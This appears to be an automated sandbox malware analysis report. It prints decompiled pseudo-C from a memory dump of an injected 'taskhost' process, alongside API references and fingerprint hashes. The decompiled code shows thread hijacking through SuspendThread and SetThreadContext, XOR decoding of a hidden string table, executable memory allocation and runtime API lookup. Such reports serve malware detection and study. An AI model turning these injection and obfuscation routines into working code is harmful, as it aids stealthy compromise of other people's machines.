Opcode Fuzzy Hash: 9e4906e4226bb05ffe812c9a4295a906a91bd814b392bf93b50403c02a754fab
Instruction Fuzzy Hash: 70115EB5D00209EBEF28DBA4DC4CBAFB7F8BB04309F049959D522AE180E7759644CB91

Uniqueness

Uniqueness Score: 4.01%

Function 015D9E3E, Relevance: 4.5, APIs: 3, Instructions: 44
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E015D9E3E(long* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				int _t10;
				signed int _t16;
				int _t20;
				void* _t21;
				intOrPtr* _t22;

				_t22 = __eax;
				_t20 = 0;
				 *((intOrPtr*)(__eax)) = 0;
				 *((intOrPtr*)(__eax + 4)) = 0;
				 *((intOrPtr*)(__eax + 8)) = 0;
				_t10 = E015D9D74(__eax); // executed
				if( *_t22 != 0) {
					_t16 = 0;
					if( *((intOrPtr*)(_t22 + 8)) <= 0) {
						L7:
						return _t10;
					}
					while(1) {
						_t10 = OpenThread(0x5a, _t20,  *( *_t22 + _t16 * 4));
						_t21 = _t10;
						if(_t21 != 0) {
							SuspendThread(_t21); // executed
							E015D9CB0(_a4, _t21, _a8);
							_t10 = CloseHandle(_t21); // executed
						}
						_t16 = _t16 + 1;
						if(_t16 >=  *((intOrPtr*)(_t22 + 8))) {
							goto L7;
						}
						_t20 = 0;
					}
					goto L7;
				}
				return _t10;
			}

0x015d9e42
0x015d9e45
0x015d9e47
0x015d9e49
0x015d9e4c
0x015d9e4f
0x015d9e56
0x015d9e59
0x015d9e5e
0x015d9e9a
0x00000000
0x015d9e9a
0x015d9e64
0x015d9e6c
0x015d9e72
0x015d9e76
0x015d9e79
0x015d9e86
0x015d9e8e
0x015d9e8e
0x015d9e94
0x015d9e98
0x00000000
0x00000000
0x015d9e62
0x015d9e62
0x00000000
0x015d9e64
0x015d9e9e

APIs

Part of subcall function 015D9D74: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 015D9D7E
Part of subcall function 015D9D74: Thread32First.KERNEL32(00000000,?), ref: 015D9D9C
Part of subcall function 015D9D74: CloseHandle.KERNELBASE(?), ref: 015D9E35

OpenThread.KERNEL32(0000005A,00000000,00000000,00000000,?,00000000,?,015DA2FA,00000000,00000001,00000000), ref: 015D9E6C
SuspendThread.KERNELBASE(00000000,?,00000000,?,015DA2FA,00000000,00000001,00000000), ref: 015D9E79

Part of subcall function 015D9CB0: GetThreadContext.KERNEL32(00000000,?), ref: 015D9CD0
Part of subcall function 015D9CB0: SetThreadContext.KERNEL32(00000000,00010001), ref: 015D9D63

CloseHandle.KERNELBASE(00000000), ref: 015D9E8E

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: Thread$CloseContextHandle$CreateFirstOpenSnapshotSuspendThread32Toolhelp32
String ID:
API String ID: 898933015-0
Opcode ID: 6895446f5313900c3b4a454e5081e7a5ee5d02e5e86149eca8ed69d49b9664a6
Instruction ID: 4e8298877bf581fb211e2dfed540448a24c76d4d9f7eddc5654ba18e2a9a61a7
Opcode Fuzzy Hash: 6895446f5313900c3b4a454e5081e7a5ee5d02e5e86149eca8ed69d49b9664a6
Instruction Fuzzy Hash: AFF0A436400602EFD7315FAED88082BFBF9FFC1759315851EE5998E214DA719441DB51

Uniqueness

Uniqueness Score: 0.80%

Function 015E5C60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9
memoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E015E5C60() {
				void* _t1;

				_t1 = HeapCreate(0, "409", 0); // executed
				 *0x1602c8c = _t1;
				return _t1;
			}

0x015e5c6c
0x015e5c72
0x015e5c78

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,?,015DBD74), ref: 015E5C6C

Strings

409, xrefs: 015E5C65

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: CreateHeap
String ID: 409
API String ID: 10892065-1549806245
Opcode ID: 197d1925adc943d2e9edf7e0b9ef45740a23491c5282295c872feccfa8da30d6
Instruction ID: e0f44b3f16210759b08f23ba53213bd90e4f23be121ca07149b2148d98bb3a42
Opcode Fuzzy Hash: 197d1925adc943d2e9edf7e0b9ef45740a23491c5282295c872feccfa8da30d6
Instruction Fuzzy Hash: CDB092316883086BE2A4AAD2AC0AB053BA9A700B61F204016F60C5E2C4A9E120185F6A

Uniqueness

Uniqueness Score: 23.02%

Function 015E64B0, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 121
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E015E64B0(void* __eflags, signed int _a4) {
				int _v8;
				signed int _v12;
				signed int _v16;
				void _v82;
				short _v84;
				signed int _v88;
				char _v92;
				short _t51;
				signed int _t53;
				signed int _t64;
				signed int _t66;
				signed int _t68;
				char _t70;
				void* _t71;
				signed int _t84;
				signed int _t89;
				signed int _t95;
				void* _t100;
				void* _t102;
				void* _t104;

				_v8 = 0;
				_v16 = 0x100;
				_t51 =  *0x15f538c; // 0x0
				_v84 = _t51;
				_t77 =  &_v82;
				memset( &_v82, 0, 0x3e);
				_v16 = _v16 + _a4;
				_t53 = E015E5D20( &_v82,  &E015F4B50, 0x839);
				_t102 = _t100 + 0x14;
				 *0x1602c94 = _t53;
				if( *0x1602c94 != 0) {
					if((_v16 & 0x00000003) == 0) {
						L7:
						 *0x1602c90 = 0;
						_v12 = 0;
						_v88 = 1;
						while(_v12 < 0x838) {
							_t24 = _v12 % 0x40 + 0x15fcc90; // 0xc665b518
							_t64 =  *0x1602c94; // 0x28d0590
							_t95 =  *0x1602c94; // 0x28d0590
							 *((char*)(_t95 + _v12)) =  *(_t64 + _v12) ^  *_t24;
							_t66 =  *0x1602c94; // 0x28d0590
							if( *((char*)(_t66 + _v12)) == 0) {
								_v16 = _a4;
								_t68 = _v12;
								_t84 =  *0x1602c94; // 0x28d0590
								_t32 = _t68 + 1; // 0x28d0591
								0x1602e20[_v88] = _t84 + _t32;
								_v88 = _v88 + 1;
							}
							_t77 = _v12 + 1;
							_v12 = _v12 + 1;
						}
						_t89 =  *0x1602c94; // 0x28d0590
						 *0x1602e20 = _t89;
						_v88 = 0;
						while(_v88 < 0x100) {
							if(_v88 < 0x41 || _v88 > 0x5a) {
								_t77 = _v88;
								 *((char*)(_v88 + 0x1602fa0)) = _v88;
							} else {
								_t77 = _v88 + 0x20;
								 *((char*)(_v88 + 0x1602fa0)) = _v88 + 0x20;
							}
							_v88 = _v88 + 1;
						}
						if(E015E8E60(_t77, _a4) >= 0) {
							return 0;
						}
						return 0xfffffffe;
					}
					_t70 = E015E6780( &_v82, 0x2a50);
					_t102 = _t102 + 4;
					_v92 = _t70;
					if(_v92 == 0) {
						goto L7;
					}
					_t77 = _v92;
					_t71 = E015E90F0(_v92); // executed
					_t104 = _t102 + 4;
					if(_t71 == 0) {
						E015E6890( &_v92);
						_t102 = _t104 + 4;
						goto L7;
					}
					return E015E6890( &_v92) | 0xffffffff;
				}
				return _t53 | 0xffffffff;
			}

0x015e64b6
0x015e64bd
0x015e64c4
0x015e64ca
0x015e64d2
0x015e64d6
0x015e64e4
0x015e64f1
0x015e64f6
0x015e64f9
0x015e6505
0x015e6515
0x015e655d
0x015e655d
0x015e6567
0x015e656e
0x015e6580
0x015e6595
0x015e659c
0x015e65a9
0x015e65b2
0x015e65b4
0x015e65c1
0x015e65c6
0x015e65c9
0x015e65cc
0x015e65d2
0x015e65d9
0x015e65e6
0x015e65e6
0x015e657a
0x015e657d
0x015e657d
0x015e65eb
0x015e65f1
0x015e65f7
0x015e6609
0x015e6616
0x015e6632
0x015e6635
0x015e661e
0x015e6621
0x015e6627
0x015e6627
0x015e6606
0x015e6606
0x015e664b
0x00000000
0x015e6654
0x00000000
0x015e664d
0x015e651c
0x015e6521
0x015e6524
0x015e652b
0x00000000
0x00000000
0x015e652d
0x015e6531
0x015e6536
0x015e653b
0x015e6555
0x015e655a
0x00000000
0x015e655a
0x00000000
0x015e6549
0x00000000

APIs

memset.MSVCRT ref: 015E64D6

Strings

Z, xrefs: 015E6618

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: memset
String ID: Z
API String ID: 2221118986-1505515367
Opcode ID: 707054f2f8cda0257bf7e6165dc83baa5c7edb1cf7b29ade7c95a373679bfa9c
Instruction ID: f2f4d09023e40685fc35294f7fbfe5f94febcaf6beec762e2a4ccfaa86851e63
Opcode Fuzzy Hash: 707054f2f8cda0257bf7e6165dc83baa5c7edb1cf7b29ade7c95a373679bfa9c
Instruction Fuzzy Hash: DA51BCB0E00248DBDB19CFE8D99C6AEBBF1BF64348F148159D4065F389E7349A58CB41

Uniqueness

Uniqueness Score: 100.00%

Function 015D2A75, Relevance: 3.1, APIs: 2, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E015D2A75(intOrPtr* _a4, CHAR* _a8) {
				CHAR* _v8;
				void* __ecx;
				void* __esi;
				CHAR* _t10;
				CHAR* _t14;
				CHAR* _t22;
				void* _t24;
				struct HINSTANCE__* _t27;
				intOrPtr* _t30;

				_push(_t24);
				_t22 = _a8;
				if(_t22 == 0) {
					L11:
					return 0;
				} else {
					_t30 = _a4;
					do {
						_t10 = E015E6780(_t24,  *_t30);
						_pop(_t24);
						_v8 = _t10;
						if(_t10 != 0) {
							_t27 = GetModuleHandleA(_t10);
							E015E6890( &_v8);
							_pop(_t24);
							if(_t27 != 0) {
								_t5 = _t30 + 4; // 0x7b
								_t14 = E015E6780(_t24,  *_t5);
								_pop(_t24);
								_a8 = _t14;
								if(_t14 != 0) {
									if(GetProcAddress(_t27, _t14) != 0) {
										E015D29E5(_t30, _t15); // executed
										E015E6890( &_a8);
									} else {
										E015E6890( &_a8);
									}
									_pop(_t24);
								}
							}
						}
						_t30 = _t30 + 0x15;
						_t22 = _t22 - 1;
					} while (_t22 != 0);
					goto L11;
				}
			}

0x015d2a78
0x015d2a7a
0x015d2a7f
0x015d2aec
0x015d2af0
0x015d2a81
0x015d2a82
0x015d2a86
0x015d2a88
0x015d2a8d
0x015d2a8e
0x015d2a93
0x015d2a9c
0x015d2aa2
0x015d2aa7
0x015d2aaa
0x015d2aac
0x015d2aaf
0x015d2ab4
0x015d2ab5
0x015d2aba
0x015d2ac6
0x015d2ad4
0x015d2add
0x015d2ac8
0x015d2acc
0x015d2acc
0x015d2ae3
0x015d2ae3
0x015d2aba
0x015d2aaa
0x015d2ae4
0x015d2ae7
0x015d2ae7
0x00000000
0x015d2aeb

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,015D2BAD,015FC3D8,00000001,015DBE2D), ref: 015D2A96
GetProcAddress.KERNEL32(00000000,00000000,?,?,?,015D2BAD,015FC3D8,00000001,015DBE2D), ref: 015D2ABE

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-0
Opcode ID: e52813475b90f053726e9f427768bd1f66f317e86ab3ac5145a718d0dc7342aa
Instruction ID: c3196bec0b73b8080bc24cfa77402c3b19ffbf0ae89151604638129d733e86a7
Opcode Fuzzy Hash: e52813475b90f053726e9f427768bd1f66f317e86ab3ac5145a718d0dc7342aa
Instruction Fuzzy Hash: 89018472A04207A79B39EFADDC4889F7BECFE942A0B14442AE914DE100EBB4E5014721

Uniqueness

Uniqueness Score: 0.10%

Function 015E9E00, Relevance: 3.0, APIs: 2, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E015E9E00(void* __ecx) {
				char _v8;

				_v8 = 0;
				if( *0x15fffc4 != 0) {
					 *0x15fffc4(GetCurrentProcess(),  &_v8); // executed
				}
				return _v8;
			}

0x015e9e04
0x015e9e12
0x015e9e1f
0x015e9e1f
0x015e9e2b

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 015E9E18
IsWow64Process.KERNELBASE(00000000), ref: 015E9E1F

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: Process$CurrentWow64
String ID:
API String ID: 1905925150-0
Opcode ID: 4f0a7caded45526ac56f931521bc51a89b4b6e96ec2062953b982558472515a6
Instruction ID: b5f9b89d8bb87b2208f94cf5bc879ab0afd6efeea56c165c0149963458c7c130
Opcode Fuzzy Hash: 4f0a7caded45526ac56f931521bc51a89b4b6e96ec2062953b982558472515a6
Instruction Fuzzy Hash: 12D01775805208EBCB24EBD4E64CB4DBBFCA709209F01008AE91886284D6355A08AB90

Uniqueness

Uniqueness Score: 0.17%

Function 015D2A16, Relevance: 1.5, APIs: 1, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E015D2A16(void* __eflags) {
				void* _t1;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t22;
				void* _t23;

				E015D308C(_t1);
				_t18 = 0xa;
				E015D29C3(0x15fc3f0, _t18);
				_t19 = 0xa;
				E015D29C3(0x15fc520, _t19);
				E015D29C3(0x15fc3d8, 1);
				_t22 = 4;
				E015D29C3(0x15fc4c8, _t22);
				_t23 = 7;
				E015D29C3(0x15fc6a0, _t23);
				 *0x15fe1b4 = 0;
				 *0x15fe1b8 = 0;
				 *0x1602cc0 = 0;
				 *0x1602cc4 = 0;
				 *0x1602cc8 = 0;
				E015DA044(_t23);
				_t14 = HeapCreate(0, 0, 0); // executed
				 *0x15fe1b8 = _t14;
				if(_t14 == 0) {
					_push(9);
					_pop(0);
				} else {
					E015D9569(_t14);
				}
				E015DA08C();
				return 0;
			}

0x015d2a16
0x015d2a1d
0x015d2a23
0x015d2a2a
0x015d2a30
0x015d2a3d
0x015d2a44
0x015d2a4a
0x015d2a51
0x015d2a57
0x015da09d
0x015da0a3
0x015da0a9
0x015da0af
0x015da0b5
0x015da0bb
0x015da0c3
0x015da0c9
0x015da0d0
0x015da0d9
0x015da0db
0x015da0d2
0x015da0d2
0x015da0d2
0x015da0dc
0x015da0e4

APIs

Part of subcall function 015D308C: InitializeCriticalSection.KERNEL32(015FE108,015D2A1B,015DBDE4), ref: 015D3091

Part of subcall function 015DA044: InterlockedCompareExchange.KERNEL32(015FE1B4,00000001,00000000), ref: 015DA057
Part of subcall function 015DA044: Sleep.KERNEL32(00000001,?,?,?,015DA2B0,00000000), ref: 015DA074
Part of subcall function 015DA044: InterlockedCompareExchange.KERNEL32(015FE1B4,00000001,00000000), ref: 015DA07E

HeapCreate.KERNELBASE(00000000,00000000,00000000,00000000,015DBDE4), ref: 015DA0C3

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: CompareExchangeInterlocked$CreateCriticalHeapInitializeSectionSleep
String ID:
API String ID: 525373618-0
Opcode ID: ef6de413b498eb06dee92ae967de4d6071b704c62cd6fe056d7f0fe393c90946
Instruction ID: 9aa1b222a1bc709b62d8f8a5046066045d0c2251c5b977cbbc42654208e4e810
Opcode Fuzzy Hash: ef6de413b498eb06dee92ae967de4d6071b704c62cd6fe056d7f0fe393c90946
Instruction Fuzzy Hash: 5C01AF7164932296C2757B6C7815E4E2AD4FB95B90F21081FF209DF3C4CAA0458457BA

Uniqueness

Uniqueness Score: 0.02%

Function 015E9E30, Relevance: 1.5, APIs: 1, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E015E9E30() {
				signed int _v8;
				struct _SYSTEM_INFO _v44;

				_v8 = 0;
				if( *0x15fe2b8 == 0) {
					GetSystemInfo( &_v44); // executed
					_v8 = _v44.dwOemId;
				} else {
					_v8 = 9;
				}
				if((_v8 & 0x0000ffff) != 9) {
					if((_v8 & 0x0000ffff) != 0) {
						while(0 != 0) {
						}
					} else {
						while(0 != 0) {
						}
					}
				} else {
					while(0 != 0) {
					}
				}
				return _v8;
			}

0x015e9e38
0x015e9e43
0x015e9e54
0x015e9e5e
0x015e9e45
0x015e9e4a
0x015e9e4a
0x015e9e69
0x015e9e79
0x015e9e83
0x015e9e87
0x015e9e7b
0x015e9e7b
0x015e9e7f
0x015e9e81
0x015e9e6b
0x015e9e6b
0x015e9e6f
0x015e9e71
0x015e9e90

APIs

GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,015EA371,?), ref: 015E9E54

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: ed4fd15768f1862e6d1baa341c7d25c1e8fe2d9e343fbe1f5ffa5a54aada23b3
Instruction ID: e837ee2aad5b93e41e94d76a04a5291b6ee861764fc466d62402a4cc801afcd3
Opcode Fuzzy Hash: ed4fd15768f1862e6d1baa341c7d25c1e8fe2d9e343fbe1f5ffa5a54aada23b3
Instruction Fuzzy Hash: 4AF09028D09208DDDB3CDBE9950C2FDB6F5BF84608F28599AEF065E244F2304A40D396

Uniqueness

Uniqueness Score: 0.02%

Function 015DF124, Relevance: 1.5, APIs: 1, Instructions: 24
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E015DF124() {
				signed int _t1;
				void* _t6;

				_t1 = CreateMutexA(0, 0, 0); // executed
				 *0x1600b70 = _t1;
				if(_t1 != 0) {
					E015E5F70(_t6, 0x16001f0, 0, 0x980);
					E015E5F70(_t6, 0x1600b88, 0, 0x2100);
					return 0;
				} else {
					return _t1 | 0xffffffff;
				}
			}

0x015df12a
0x015df130
0x015df137
0x015df149
0x015df159
0x015df164
0x015df139
0x015df13d
0x015df13d

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000,00000000,015DBE19), ref: 015DF12A

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: bcba83c8fae62712cb0ec6f5da994c7feb64e14ca3b062d8195ce86ffc24959f
Instruction ID: 493e5944b9685cbaef0af5f572a95a780f4ad6bc7b5724cc4a017cbdb00b306b
Opcode Fuzzy Hash: bcba83c8fae62712cb0ec6f5da994c7feb64e14ca3b062d8195ce86ffc24959f
Instruction Fuzzy Hash: 63D0C2359A523131827636BA3C0DFCB2C48AF436F4B400201F039891C5EB80108283E0

Uniqueness

Uniqueness Score: 0.03%

Function 015E90F0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 015E9101

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4190ed6b73747a4528c95a354b54d77082d343946a0891a5963c96f38efbdd35
Instruction ID: 0025ea9ba5066f7cfeb27523ec29cdb1e00ca2ce194004f964c591d209515118
Opcode Fuzzy Hash: 4190ed6b73747a4528c95a354b54d77082d343946a0891a5963c96f38efbdd35
Instruction Fuzzy Hash: 7FE08C75D0130CEBCF1CCFA9D94919DBFB4AB00210F1082A9D8106B280E6318A408B80

Uniqueness

Uniqueness Score: 0.01%

Function 015D7B0D, Relevance: 1.5, APIs: 1, Instructions: 18
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E015D7B0D(void* __ecx) {
				signed int _t1;
				signed int _t2;
				void* _t7;

				_t7 = __ecx;
				_t1 = CreateMutexA(0, 0, 0); // executed
				 *0x15fe144 = _t1;
				if(_t1 != 0) {
					_t2 = E015E5C80(_t7, 0x3100);
					 *0x15fe140 = _t2;
					asm("sbb eax, eax");
					return ( ~_t2 & 0x00000002) - 2;
				} else {
					return _t1 | 0xffffffff;
				}
			}

0x015d7b0d
0x015d7b13
0x015d7b19
0x015d7b20
0x015d7b2b
0x015d7b30
0x015d7b37
0x015d7b40
0x015d7b22
0x015d7b25
0x015d7b25

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000,015DBE1E), ref: 015D7B13

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 56c99a0a01b965239f7bddd6e0f7f58e5f577b88a29224985a8dcd3fc98f3f54
Instruction ID: a6543ca2c34534007c280df57e0edfd8ff86ad63f882365f73b53adf58a1e9b1
Opcode Fuzzy Hash: 56c99a0a01b965239f7bddd6e0f7f58e5f577b88a29224985a8dcd3fc98f3f54
Instruction Fuzzy Hash: 3ED0A775AE070345E7340E7D9C07F453990B705B25F954314E130CD1D4F794C0045301

Uniqueness

Uniqueness Score: 0.03%

Function 015D959A, Relevance: 1.3, APIs: 1, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E015D959A() {
				void* _t7;
				intOrPtr* _t8;
				void _t9;
				void* _t11;

				_t7 =  *0x1602ccc; // 0x1f00000
				while(_t7 != 0) {
					if( *((intOrPtr*)(_t7 + 4)) == 0) {
						_t7 =  *_t7;
						continue;
					}
					L8:
					return _t7;
				}
				_t7 = VirtualAlloc(0, 0x1000, 0x3000, 0x40); // executed
				if(_t7 != 0) {
					_t2 = _t7 + 0x20; // 0x20
					_t8 = _t2;
					 *((intOrPtr*)(_t7 + 4)) = 0;
					 *((intOrPtr*)(_t7 + 8)) = 0;
					_t11 = _t8 - _t7;
					do {
						 *_t8 =  *((intOrPtr*)(_t7 + 4));
						 *((intOrPtr*)(_t7 + 4)) = _t8;
						_t11 = _t11 + 0x20;
						_t8 = _t8 + 0x20;
					} while (_t11 <= 0xfe0);
					_t9 =  *0x1602ccc; // 0x1f00000
					 *_t7 = _t9;
					 *0x1602ccc = _t7;
					return _t7;
				}
				goto L8;
			}

0x015d959a
0x015d95ab
0x015d95a7
0x015d95a9
0x00000000
0x015d95a9
0x015d95f7
0x015d95f7
0x015d95f7
0x015d95bc
0x015d95c4
0x015d95c6
0x015d95c6
0x015d95cb
0x015d95ce
0x015d95d1
0x015d95d3
0x015d95d6
0x015d95d8
0x015d95db
0x015d95de
0x015d95e1
0x015d95e9
0x015d95ef
0x015d95f1
0x00000000
0x015d95f1
0x00000000

APIs

VirtualAlloc.KERNELBASE(00000000,00001000,00003000,00000040,015D2BAD,015D95FD,015DA1A9,00000000,00000000,015FC3D8,015D2BAD,015FE194,?,015D2AD9,00000000), ref: 015D95BC

Memory Dump Source

Source File: 00000013.00000002.757799892.015D0000.00000040.00000001.sdmp, Offset: 015D0000, based on PE: true

Associated: 00000013.00000002.757853407.01602000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_15d0000_taskhost.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bcd27398d0866c90a3f433875ed36e64a101dab0c66ca843dde3f51728d99099
Instruction ID: 74b50b2913a2a820064b2378a583096f94f997dab0f58cede439ef70dc5c24e1
Opcode Fuzzy Hash: bcd27398d0866c90a3f433875ed36e64a101dab0c66ca843dde3f51728d99099
Instruction Fuzzy Hash: B9F09070A011208FD736CF5CED88B597BE1BF48B04B55C0AAE408DF399C670D940CB84

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Function 015E51D0, Relevance: 8.1, Strings: 6, Instructions: 578
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E015E51D0() {
				signed int _t162;
				unsigned int _t170;
				unsigned int _t171;
				signed int _t172;
				signed int _t174;
				signed int _t176;
				signed int _t177;
				signed int _t180;
				signed int _t182;
				unsigned int _t183;
				int _t184;
				int _t192;
				signed char _t198;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				int _t208;
				int _t220;
				signed int _t225;
				signed int _t233;
				signed int _t248;
				signed char _t249;
				unsigned int _t250;
				signed char _t251;
				signed int* _t252;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t262;
				intOrPtr _t267;
				signed char _t274;
				signed int _t275;
				char* _t276;
				signed int _t278;
				signed char _t280;
				signed int _t283;
				signed int _t287;
				int _t288;
				int _t289;
				int _t292;
				int _t294;
				int _t298;
				signed int _t301;
				signed char _t307;
				signed char _t308;
				signed char _t311;
				signed char _t312;
				signed int _t314;
				int _t315;
				int _t316;
				signed char _t318;
				int _t320;
				int _t322;
				int _t326;
				signed int _t329;
				signed char _t332;
				signed char _t333;
				signed char _t335;
				int _t337;
				signed int _t343;
				int _t345;
				intOrPtr _t346;
				intOrPtr _t347;
				unsigned int _t352;
				unsigned int _t357;
				signed int _t360;
				signed int _t361;
				intOrPtr _t362;
				void* _t363;
				intOrPtr* _t374;
				void* _t375;
				intOrPtr* _t383;
				void* _t384;
				signed int _t389;
				void* _t390;
				signed int _t391;
				void* _t396;
				void* _t398;
				intOrPtr* _t405;
				void* _t406;
				signed int _t407;
				void* _t409;
				intOrPtr* _t416;
				void* _t417;
				unsigned int _t422;
				signed int _t423;
				void* _t425;
				signed int* _t426;
				void* _t430;

				asm("pushfd");
				_t426 = _t425 - 0x40;
				asm("cld");
				_t389 = _t426[0x16];
				_t362 =  *((intOrPtr*)(_t389 + 0x1c));
				_t162 =  *_t389;
				_t426[0xb] = _t162;
				_t426[5] =  *((intOrPtr*)(_t389 + 4)) + _t162 - 0xb;
				_t267 =  *((intOrPtr*)(_t389 + 0x10));
				_t248 =  *(_t389 + 0xc);
				_t426[0xf] = _t248;
				_t426[0xa] =  ~(_t426[0x17] - _t267) + _t248;
				_t426[4] = _t267 - 0x101 + _t248;
				_t426[2] =  *(_t362 + 0x4c);
				_t426[3] =  *(_t362 + 0x50);
				 *_t426 = (1 <<  *(_t362 + 0x54)) - 1;
				_t426[1] = (1 <<  *(_t362 + 0x58)) - 1;
				_t170 =  *(_t362 + 0x28);
				_t343 =  *(_t362 + 0x34);
				_t426[0xd] = _t170;
				_t426[0xc] =  *(_t362 + 0x30);
				_t426[0xe] = _t343;
				_t422 =  *(_t362 + 0x38);
				_t249 =  *(_t362 + 0x3c);
				_t390 = _t426[0xb];
				_t274 = _t426[5];
				if(_t274 > _t390) {
					L2:
					if((_t390 & 0x00000003) != 0) {
						_t390 = _t390 + 1;
						_t274 = _t249;
						_t249 = _t249 + 8;
						_t170 = 0 << _t274;
						_t422 = _t422 | _t170;
						goto L2;
					}
					goto L4;
				} else {
					_t337 = _t274 + 0xb - _t390;
					_t170 = memset(_t390 + _t337 + _t337, 0, memcpy( &(_t426[7]), _t390, _t337) << 0);
					_t426 =  &(_t426[6]);
					_t274 = 0;
					_t390 =  &(_t426[7]);
					_t426[5] = _t390;
					L4:
					_t363 = _t426[0xf];
					while(1) {
						_t430 =  *0x15fcc40 - 2;
						if(_t430 == 0) {
							break;
						}
						if(_t430 > 0) {
							do {
								if(_t249 <= 0xf) {
									asm("lodsw");
									_t318 = _t249;
									_t249 = _t249 + 0x10;
									_t422 = _t423 | 0 << _t318;
								}
								_t171 =  *(_t426[2] + ( *_t426 & _t422) * 4);
								while(1) {
									_t250 = _t249 - _t171;
									_t423 = _t422 >> _t171;
									if(_t171 == 0) {
										asm("stosb");
										goto L22;
									}
									_t352 = _t171 >> 0x10;
									_t307 = _t171;
									if((_t171 & 0x00000010) == 0) {
										if((_t171 & 0x00000040) != 0) {
											L97:
											if((_t171 & 0x00000020) == 0) {
												_t276 = "invalid literal/length code";
												_t346 = 0x1a;
											} else {
												_t276 = 0;
												_t346 = 0xb;
											}
											L101:
											_t172 = _t426[0x16];
											if(_t276 != 0) {
												 *(_t172 + 0x18) = _t276;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x1c)))) = _t346;
											goto L104;
										}
